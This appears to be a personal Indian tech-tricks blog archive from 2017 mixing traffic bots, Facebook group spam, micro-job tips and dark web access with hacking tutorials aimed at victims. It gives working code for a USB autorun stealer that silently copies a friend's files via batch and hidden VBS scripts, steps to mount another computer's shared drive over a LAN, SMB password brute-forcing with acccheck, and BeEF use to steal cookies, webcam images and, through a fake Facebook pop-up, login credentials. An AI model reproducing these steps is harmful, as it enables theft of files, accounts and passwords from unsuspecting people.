Showing posts with label WaP MaSteR... Show all posts
Showing posts with label WaP MaSteR... Show all posts

Friday, 25 August 2017

HOW TO BOOST YOUR WEBSITE OR BLOG TRAFFIC...... (INCREASE YOUR BLOG VISITORS)




Hi Friends i m Back...
Today i m going to tell you that how you increase yourvisitorsof your blog or website just by following this unique trick...


friends now a days increase traffic is a very difficult on blog or website, so today i will tell u the you that how you increase your traffic ,,,, So lets Start


HOW TO USE;;;;



1-First go to your blog/website and see your traffic and note it

2- Then open your google playstore n download AUTOMATED TRAFFIC BOT or CLICK HERE TO DOWNLOAD


3-install that application in your android phone
4-click on that search box and type your blog/website link (ex-https://aimtricks.blogspot.com)


5-then hit on BOOST TRAFFIC Button
see the magic , its all done


now after few minutes go to your blog/website and see the increasing traffic







ALSO WATCH THIS VIDEO IF ANY CONFUSION


IF THIS TRICK WORKS FOR YOU THEN PLEASE COMMENT HERE

at No comments:
Labels: ,

Wednesday, 16 August 2017

How to increase your YouTube or blog visitor, viewers, and subscribers just by following this Unique trick.


Hii friends i m back..



Friends today i m going to tell you about FACEBOOK AUTOPOST,,



INTRODUCTION :-


Facebook Autopost means to post Massage in several groups and pages of Facebook just only in one click.

Suppose if you have any YouTube channel or any blog or website and you want to promote it or public it, so this trick is very usefull for you because you can post your channel or blog Link in 1000 + of groups just only in 1 click and it helps to your increase viewers.



HOW TO USE IT :-





@- open your any browser and type www.wefbee.com or CLICK HERE TO VISIT WEBSITE. (FB Autopost website)

@- Now sign up there just by following their steps and verify it by your Email.


@- After creating account, login it.

@- after login you will see a notification pop-up in your wefbee id for link to Facebook, it means that you have to link your Facebook account with wefbee account..







How to link your Facebook account



#- Click on Setting option



#- Click on Facebook account



#- click on add update Facebook account



#-click on Authorize and copy app url


#- after that you have to give permission to link your Facebook account with that any app and copy tha url after giving permission and back it and past that link and then the token will be generated automatically and after click on add Facebook account... Now it's done, your account is linked now with FB.






@- Now click on home button and type your massage in that box as what you want to post in several group

@- After that set time interval... I recommend to select less time interval (60 sec)



@- now last step__ mark all your shown groups and pages and then click on SEND NOW.





Now it's all done.





Your massage will be post in every group with the time interval of your selected..




WATCH THIS VIDEO TO UNDERSTAND BETTER



at No comments:
Labels: , ,

Sunday, 6 August 2017

How to earn money 10 to 15 dollar just only in 15 minutes.











Hi friend's i m back



Sorry mai bahot dino sy koe trick nae post kr pya bcz i was little bzy so i m really sorry..


So friends today i going to telling you about online money making , that how to make 10 to 15 dollar just only in 15 minute's work.


It's very simple gyess just follow me.


REQUIREMENTS:-



*Mobile phone, laptop or computer
*Better net connection
*Follow me



HOW TO USE :-




* Open google chrome in your phone.

*In search box type microworkers.com or also can
Click here


*Register your account as just like you sign up in Other website's

* Now fill your full real information.

*After that verify your email and then visit to this site .

* Now Click on ALL JOBS category and you will see that there are many types of jobs are seen on screen.


*Now you can see that there are maximums types of jobs are on screen and every job will give you different payment. Some will give more and some will less payment.
So i request you that you only do that job which gives maximum payment and have good percentage % of success rate.
When you click on that any job it will redirect to any new page and that will give to some option to do like sign up, register, or view add etc.
So you have to do as what it said and after than back n refresh your Micro workers page , and again click on other job and do what it say...so repeat it as how you can and your payment will be added in your microworkers account.


How to WITHDRAW YOUR
MONEY



First click on three Dot's on right side corner



Then click on withdraw option


After then choose your option that how you want to withdraw , with paypal or as ur wish .



ALSO WATCH FULL TUTORIAL BY Click Bellow ( My YOUTUBE Chanel )




CLICK HERE to WATCH FULL TUTURIAL

at No comments:
Labels: ,

Tuesday, 18 April 2017

BEST HACKING WEBSITES OF DARK WEB.




How To Access The Deep Web or Darkweb


The deep web is not a single location, but a whole class of different locations which share one thing in common – that they are hidden from search engines and regular internet users. Different areas of the deep web therefore have different requirements for you to be able to access them, and any technology which you use will only give you access to its specific area of the hidden internet. Having said that, there is a very small number of technologies used to create what is popularly called the ‘deep web’ or ‘darknet’, and one in particular which the vast majority of people use – TOR


Best Hacking Websites on The Dark Net : –

The Art of Human Hacking



Strategic Intelligence Network.


SUMXI


Ranting for the Revolution..

Galaxy2

Hack Canada

Dur69

Hack Group

Hidden Answers




at No comments:
Labels: , , ,

Monday, 17 April 2017

How to Access Darknet (darkweb) : The Hidden Anonymous Internet

May be you are aware of the mysterious hidden internet called the 'DarkNet’ (DARK WEB) or ‘Deep Web’ that you can’t access from Google and which lies beyond the reach of most of the people like us. Perhaps you have heard of some Hacker selling credit card information, Online Data leaked of big companies(Ashley Madison,Sony,etc) and variety of these information. Maybe you live in a country where you are not allowed to speak freely… If you don’t know, then we will tell you what it is and how to access Darknet.

What is Dark Web?


First you would need to know about Deep Web. Deep web is 99% of the internet that is not accessible using Google. Deep Web includes large libraries, large databases and members’ only websites that are not available to the general public. If you have a library network in your College campus or database network in your company that only you can get access to, it is DarkWeb.

Darknet is an overlay network that can only be accessed using specific software,configurations,or authorization. It is part of the Deep Web, because its contents are not accessible through search engines. But it is something more, it is anonymous. It hosts anonymous websites. Yeah, you wouldn’t know who the owner is unless he explicitly reveal his information. It offers full anonymity to users too. Darknet anonymity is usually achieved using an ‘onion network’. I am sure you have cut an onion once in your lifetime and you had been crazy about the number of layers it has, same happens when you use an onion network. There are numbers of encryption layers that hide your true identity.

Uses of Darkweb:

Ok, so you have grasped what Darkweb is, Now you may ask me why should you use it. Well the reason could be any of them:

1~To better protect the privacy right of citizens from targeted and mass surveillance.
2~Whistleblowing and news leaks
3~Hacking and Computer Crime. (Maybe,you may want to chat with the most dangerous of hackers).
4~Sale of restricted goods.
5~File sharing. etc...

How to Access DARKWEB?


Well the most popular way to access Darknet is by using TOR browser. Technically, it stands for ‘The Onion Router’ and it is as simple as installing a new browser.

After that you would need a URL or directory that contains URLs to different websites or class of websites so that you know what to type in into the browser’s address bar.


You can easily get URLs in Onion Directory of Darweb at http://am4wuhz3zifexz5u.onion/ or just google for Darkweb Sites.
Make sure you use TOR Browser. .Also CLICK here and DOWNLOAD TOR Browser



Just like you have Google,Yahoo,etc for our widely known Internet, Darknet also has a Search Engine. Some are Torch, Duck Duck Go,etc...

If you want to access Darknet from your pretty PHONE, you can use ORBOT(Free).


I think you wanna explore Darknet yourself, So i would leave you here. Just a piece of advice, it is used for all things legal or illegal. So just make sure you verify the links you click.

NOTE: Access Darknet with your own risk. Darknet is filled with legal as well as illegal contents. Hence make sure that you don’t click or access any illegal content. If you are facing any problems, then comment below.

at 6 comments:
Labels: , ,
Location: Paraspur, Uttar Pradesh 271504, India

Sunday, 16 April 2017

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)







Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.


STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


STEP 2


Open Notepad again and copy-paste the following lines



@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls


Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.

STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4


Open Notepad one last time and copy-paste the following line.



wscript.exe \invisible.vbs file.bat


Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.












at No comments:
Labels: , , , , ,
Location: Paraspur, Uttar Pradesh 271504, India

Friday, 14 April 2017

Hack Into A Computer Which Is Connect On same network(Lan)








Step 1:-


Finding the Target



So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local sub net. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.


Another window will pop up, make sure “All host in my subnet” is selected, and then
click ok.




It should begin to scan.





Then IP’s, computer names, and mac addresses will show up
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.



Step 2:- Trial and error.



Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the
command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):



IF it didn’t work, meaning that the target is not online, it will look something like this:



If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.

Step 3:– Gathering the information


Now, input this command “nbtstat –a (IP address of target).” An example would be
“nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.



Step 4:- Getting In.



Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s
computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view
(IP Address of Target)”


An example for this tutorial would be: “net view 192.168.1.103”



We have our just found our share name. In this case, under the share name is “C,”
meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.




As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network
drive should be there.



Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
Congratulations! You’re DONE!



-Commands used in this tutorial:
PING

NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.







at No comments:
Labels: , ,

Tuesday, 4 April 2017

HACK OLD PC n LAPTOP PASSOWRD EASILY BY KALI LINUX .











Sometimes you need a password to gain access to an older running Windows system. Maybe it's a machine in your basement you forgot about or a locked machine that belonged to a disgruntled employee. Maybe you just want to try out your pentesting skills.



When you need to access a running Windows system, you can use a dictionary attack tool like ACCCHECK to brute-force the admin's username and password as long as it's older Windows system (XP and earlier, possibly Windows 7).



Acccheck looks at Windows SMB protocol authentication, specifically the administrator account, and works over the network. Of course, if you have physical access to your machine, there are other ways to get the password, but if not, ACCCHECK is a good tool. And best of all, it's built right into Kali.


Step=>1


Starting Acccheck



Acccheck is included in Kali, so fire up a terminal and start the tool with:




acccheck



Step 2




Testing for the Default Username & Password



It will tell you a couple different ways to run the script, but you can run it straight away using the following basic syntax, where -t indicates a single host, and IP ADDRESS is the host IP of a Windows machine.


acccheck -t IP ADDRESS





That command will scan the IP address with the default "administrator" username and a blank password. It might not work, but you never know until you try!



Step 3




Testing a Suspected Username & Password





Unless you were really, really lucky, you got into the Windows computer in question already. If not, you'll have to get a little more detailed with your hack. We can be a little more thorough running the acccheck command with a few more parameters, such as:


acccheck -t IP ADDRESS -u USERNAME -p PASSWORD





In this command, -t is single host request, IP ADDRESS is your target Windows machine, -u USERNAME is the username you want to try, and -p PASSWORD is the password you think will work. Below, I'm trying "admin" and "password123" on the same machine.



If acccheck has success logging in, it creates a file called "cracked" in your working directory upon completion. After I tried a few more username and password combinations, I saw this file:




Investigating the file, I can see the IP, username, and password that worked for me. If you get on my network, you might get into 10.0.2.15 with amuck/bluesky123 as you can see below.



Step 4





Using Kali's Username & Password Lists
So now let's check out what more we can have acccheck do. Because it's a password cracker, acccheck accepts dictionaries, as well as any list of usernames you might have. On Kali, we can point at the stock dictionaries and username files, which are relatively large, and see if we have success. Below are the locations for these files.


=>/usr/share/dirb/wordlists/big.txt (dictionary file)


=>/usr/share/dirb/wordlists/others/names.txt (username file)




And this time, because you have more than one password and username to try, the syntax is a bit different—you'll need an uppercase -P and -U, which tells acccheck to search the passwords and usernames in the files. All together, this longer command is:


=>acccheck -t 10.0.2.15 -U /usr/share/dirb/wordlists/others/names.txt -P /usr/share/dirb/wordlists/big.txt




To reiterate, the uppercase letters are needed because we're calling files this time, not just words. And don't forget to use your own target IP address!





Danger: Running the command above will take a long time. The big.txt file is indeed big, and acccheck is checking all of the usernames you selected against all of the passwords, making this task very intensive! In the image above, produced when I ran the "top" command, you can see acccheck running, and it remained running for hours before I stopped it! (I eventually ran kill 19959 in a terminal, since I ran it against a VERY strong password.)


Step 5





Using Your Own Username & Password Lists




Acccheck can use more than the default username and password list included in Kali—we can use our own dictionary file, and our own list of usernames, too.




Here, I've used a popular dictionary file along with a standard list of Windows admin usernames as my password field (just admin, Admin, administrator, and Administrator). The same uppercase -P, and -U apply, because I'm calling files and not just passing individual words. My command is a lot shorter this time, however, because my files are located in the working directory:

=>acccheck -t 10.0.2.15 -U mynames.txt -P mypasswords.txt





If you've had success running acccheck against a Windows machine and it generated a valid cracked file, you should consider renaming the cracked file with a logical name, possibly including the IP address, to keep things straight moving forward. Here, I renamed my successful cracked file for 10.0.2.15 to something I will recognize in the future (cracked-10-0-2-15):



Step 6




Checking a List of IP Addresses





To get really aggressive, you can use an uppercase -T in your command to run acccheck against a range of IP addresses, not just one target IP address. I won't get into that here, but those files work the same as usernames and passwords, so get creative.




And as with many similar Windows exploits, pre-scanning your target IP to look for vulnerable ports is always a good idea, and Nmap is a good way to do just that.







at No comments:
Labels: , , ,

Friday, 3 March 2017

How to Hack Web Browsers with BeEF...through Kali Linux









Welcome back to MyAiM's Hacker...




I had promised new series on hacking web applications, mobile devices, and even Facebook here on AiM Trick's and I intend to deliver you those sometime this year. In each of those topics, I will introduce you to new hacking tools and techniques, though, one tool that we will be using in all of those areas is called the Browser Exploitation Framework , or BeEF (don't ask me what the lowercase "e" stands for).

Similar to Metasploit , BeEF is a framework for launching attacks. Unlike Metasploit, it is specific to launching attacks against web browsers. In some cases, we will be able to use BeEF in conjunction with Metasploit to launch particular attacks, so I think its time for us to become familiar with it.


BeEF was developed by a group of developers led by WADE ALCORN. Built on the familiar Ruby on Rails platform, BeEF was developed to explore the vulnerabilities in browsers and test them. In particular, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.

STEP=>1





*Start Cooking BeEF




BeEF is built into Kali Linux , and it can be started as a service and accessed via a web browser on your localhost. So let's start by firing up Kali and cooking a bit of BeEF. Start the BeEF service by going to "Applications" -> "Kali Linux" -> "System Services" -> "BeEF" -> "beef start."



STEP=>2




*Opening a Browser to BeEF



The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:


http://localhost:3000/ui/authentication



The default credentials are "beef" for both username and password.





Great! Now you have successfully logged into BeEF and are ready to begin using this powerful platform to hack web browsers.

Note that in the screenshot below that my local browser, 127.0.0.1, appears in the left hand "Hooked Browsers" explorer after I clicked on the link to the demo page. BeEF also displays its "Getting Started" window to the right.


STEP=>3



*Viewing Browser Details



If I click on the local browser, it will provide with more choices to the right including a "Details" window where we can get all the particulars of that browser. Since I am using the Iceweasel browser built into Kali, which is built upon Firefox, it shows me that the browser is Firefox.

It also shows me the version number (24), the platform (Linux i686), any components (Flash, web sockets, etc.), and more information that we will be able to use in later web application hacks.


STEP=>4



*Hooking a Browser




The key to success with BeEF is to "hook" a browser. This basically means that we need the victim to visit a vulnerable web app. This injected code in the "hooked" browser then responds to commands from the BeEF server. From there, we can do a number of malicious things on the victim's computer.

BeEF has a JavaScript file called "hook.js," and if we can get the victim to execute it in a vulnerable web app, we will hook their browser! In future tutorials, we will look at multiple ways to get the victim's browser hooked.

In the screenshot below, I have "hooked" an Internet Explorer 6 browser on an old Windows XP on my LAN at IP 192.168.89.191.




STEP=>5




*Running Commands in the Browser




Now, that we have hooked the victim's browser, we can use numerous built-in commands that can executed from the victim's browser. Below are just a few examples; there are many others.

☣Get Visited Domains
☣Get Visited URLs
☣Webcam
☣Get All Cookies
☣Grab Google Contacts
☣Screenshot

In the screenshot below, I selected the "Webcam" command that many of you may be interested in. As you can see, when I execute this command, an Adobe Flash dialog box will pop up on the screen of the user asking, "Allow Webcam?" If they click "Allow," it will begin to return pictures from the victim's machine to you.

Of course, the text can be customized, so be imaginative. For instance, you could customize the button to say "You have just won the lottery! Click here to collect your winnings!" or "Your software is out of date. Click here to update and keep your computer secure." Other such messages might entice the victim to click on the box.



STEP=>6



*Getting Cookies



Once we have the browser hooked, there is almost unlimited possibilities of what we can do. If we wanted the cookies of the victim, we can go to "Chrome Extensions" and select "Get All Cookies" as shown in the screenshot below.




When we click on the "Execute" button to the bottom right, it will begin collecting all the cookies from the browser. Obviously, once you have the user's cookies, you are likely to have access to their websites as well.


BeEF is an extraordinary and powerful tool for exploiting web browsers. In addition to what I have shown you here, it can also be used to leverage operating system attacks. We will be using it and other tools in my new series on hacking web applications, mobile devices, and Facebook,.


so keep coming back to AiM Trick's...








at No comments:
Labels: , , , ,
Location: Pune, Maharashtra, India

Sunday, 26 February 2017

How to Find the Exact Location of Any IP Address










Welcome back to MyAiM's Hacker !


Have you ever wondered where the physical location of an IP address is? Maybe you want to know if that proxy server you are using is actually out of your local legal jurisdiction. Or, maybe you have the IP address of someone you are corresponding with and want to make certain they are where they say they are. Or, maybe you are a forensic investigator tracking down a suspect who wrote a threatening email or hacked someone's company.


Now you can find the location of that IP address without a subpoena or search warrant.


A company calledMAXMIND maintains a database of the location of every IP address on the planet complete with GPS coordinates, area code, zip code, and country.

This database is not in a typical relational database format, but rather in a flat file. MaxMind charges a $370 site license and $90/month (or $1360/year) for updates to this database. Their software has a beautiful front end that makes querying the database easy enough that even Windows or Mac users can manage.

MaxMind also gives away a free developers version of this database without any software or tools to read it. Although slightly less accurate than the commercial version, the price is certainly right. All we need to find the location of the IP is a program to read this data.


Two programmers, Jennifer Ennis and T. Williams, have developed a small Python script called pygeoip and released it under the GPL license that enables us to input an IP address and output this critical information.


STEP=>1




Fire Up Kali & Open a Terminal


The first step, of course, is to fire up our our trusty
Kali system, or in this case, any Linux distribution . Then, open a terminal.


Note: Be cautious of the formatting below for commands. The formatting of this article will create big space gaps since it stretches lines out to fit the margins. This is because of long URLs that try to fit themselves on a separate line. Large spaces equals just one space, so keep that in mind. Refer to the screenshots to see how they actually look.


STEP=>2




Download the Database

Now we need to download the database from MaxMind, and we can get it by typing the following.


kali > wget -N -q
http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz





Then we need to unzip it.


kali> gzip -d GeoLiteCity.dat.gz





Let's now check that the database is in place by listing the directory.


kali > ls -alh GeoLiteCity.dat



STEP=>3




Download & Install Pygeoip

Next, we need to install the Python script to read the database, pygeoip. We can download it by typing the following.


kali > wget http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip






Then, unzip it.

kali > unzip pygeoip-0.1.3.zip




We next need to download some setup tools into the pygeoip directory.

kali > cd /pygeoip-0.1.3


kali > wget http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py



kali > wget http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg



Let's now move and then build and install the setup tools.

kali > mv setuptools-0.6c11-py2.5.egg setuptools-0.7a1-py2.5.egg


kali > python setup.py build

kali > python setup.py install



We need to move the database to the pygeoip directory so that script can access it without having to use the full path.

kali > mv GeoLiteCity.dat /pygeoip-0.1.3/GeoLiteCity.dat



STEP=>4



Query the Database

Now that we have the database in place and the pygeoip script downloaded and installed, we can begin to query that database with pygeoip.

First, we need to start a Python shell.

kali > python

Then, you will be greeted will the triple >>> indicating you are now in an interactive python shell. Let's import the module and instantiate the class.

>>>import pygeoip

>>>gip =

pygeopip.GeoIP('GeoLiteCity.dat')
Next, we are ready to begin our query. Let's see where Google is located.

>>>rec =

gip.record_by_addr('64.233.161.99')

>>>for key.val in rec.items():

... print "%s: %s" %(key,val)

...


Please note that it is critical to indent the "print". If not, you will throw an error.

As you can see, we were able to locate Google's IP in Mountain View, CA at area code 650, postal code 94043, longitude -122.0574, and latitude 37.4192. Not bad! Now, let's try to locate the IP of cnn.com.






Once again, the combination of the database and pygeoip script was able to provide us with key location information on CNN's IP address.


This little tool is great for locating any IP address in the world, albeit, it is a bit clunky. Maybe someone here in the Null Byte community with good Python skills would like to write an interactive script with a nice user interface where the user can simply enter the IP and get the record information?


Keep coming back to MyAiM's Community, as we continue to explore the tools and techniques of hacking!






at No comments:
Labels: , , , ,
Location: Mumbai Metropolitan Area, Maharashtra

Sunday, 19 February 2017

How to Get Facebook Credentials Without Hacking Facebook


Welcome back to AiM TrIcK$







Many people come to Aim Tricks looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills , and skill development is what AiM Tricks is all about.


Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux , this won't work for you—but if you are willing to take a little time to study here at AiM Tricks , you can probably gain access to someone's Facebook credentials very easily with this little trick.



STEP>1





INSTALL KALI LINUX IN YOUR PC






The first step is to download and install Kali Linux . This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system .

Within Kali, there is an app called the Browser Exploitation Framework (BeEF) . It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook
credentials, which I'll show you here.







STEP>2




OPEN BEEF




Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.






When you click on it, it starts BeEF by opening a terminal.




BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.



You will then by greeted by BeEF's "Getting Started" screen.








STEP>3


HOOK THE VICTIM'S BROWSER






This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.


The simplest way is to simply embed the code into your website and entice the user to click on it. use your imagination.


The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)










From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.





STEP>4





SEND A DIALOG BOX TO THE USER






When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.

If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the 'Commands" tab.











Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.


This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.







If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the "Execute" button the the bottom.










STEP>5





THE DIALOG BOX APPEARS ON THE TARGET SYSTEM





When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.








Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.





STEP>6




HARVEST THE CREDENTIALS





Back on our system in the BeEf interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.






If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).
If you you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!











at No comments:
Labels: , , , ,
Subscribe to: Posts (Atom)

Featured post

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)

Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome...